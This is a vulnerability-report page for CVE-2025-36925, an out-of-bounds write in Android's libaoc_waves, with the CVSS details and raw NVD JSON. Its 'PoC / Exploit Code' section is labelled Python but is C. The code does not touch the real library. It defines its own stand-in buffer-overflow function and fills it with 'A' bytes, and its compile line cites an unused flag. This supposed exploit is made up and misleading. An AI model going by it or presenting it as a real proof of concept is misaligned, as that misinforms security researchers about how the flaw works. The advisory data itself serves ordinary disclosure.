Security Vulnerability Report
中文
CVE-2025-36925 CVSS 7.8 HIGH

CVE-2025-36925

Published: 2025-12-11 20:15:57
Last Modified: 2025-12-12 17:36:31
Source: [email protected]

Description

In WAVES_send_data_to_dsp of libaoc_waves.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android Open Source Project (libaoc_waves) < 2025-12-01安全补丁版本
Google Pixel设备运行受影响Android版本
使用libaoc_waves库的第三方Android设备

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-36925 PoC - libaoc_waves out of bounds write // This PoC demonstrates triggering the vulnerability in WAVES_send_data_to_dsp // Compile: gcc -o poc poc.c -ldl #include <stdio.h> #include <stdlib.h> #include <string.h> // Simulated vulnerable function signature // Original: void WAVES_send_data_to_dsp(void* data, size_t size) void WAVES_send_data_to_dsp(void* data, size_t size) { // Vulnerable: No bounds checking on size parameter unsigned char buffer[256]; // VULNERABLE CODE: Direct copy without size validation memcpy(buffer, data, size); // size can exceed 256 bytes // Process buffer data... } int main(int argc, char* argv[]) { printf("[*] CVE-2025-36925 PoC - libaoc_waves OOB Write\n"); printf("[*] Target: WAVES_send_data_to_dsp\n\n"); // Create malicious input exceeding buffer size size_t malicious_size = 512; // Exceeds 256 byte buffer void* malicious_data = malloc(malicious_size); if (!malicious_data) { printf("[-] Memory allocation failed\n"); return 1; } memset(malicious_data, 0x41, malicious_size); // Fill with 'A' printf("[*] Triggering vulnerable function with size: %zu\n", malicious_size); printf("[*] Buffer size: 256 bytes\n"); printf("[*] Input size: %zu bytes (overflow condition)\n\n", malicious_size); // Trigger the vulnerability WAVES_send_data_to_dsp(malicious_data, malicious_size); printf("[+] Function executed - check for memory corruption\n"); free(malicious_data); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36925", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:57.110", "lastModified": "2025-12-12T17:36:31.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In WAVES_send_data_to_dsp of libaoc_waves.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/pixel/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.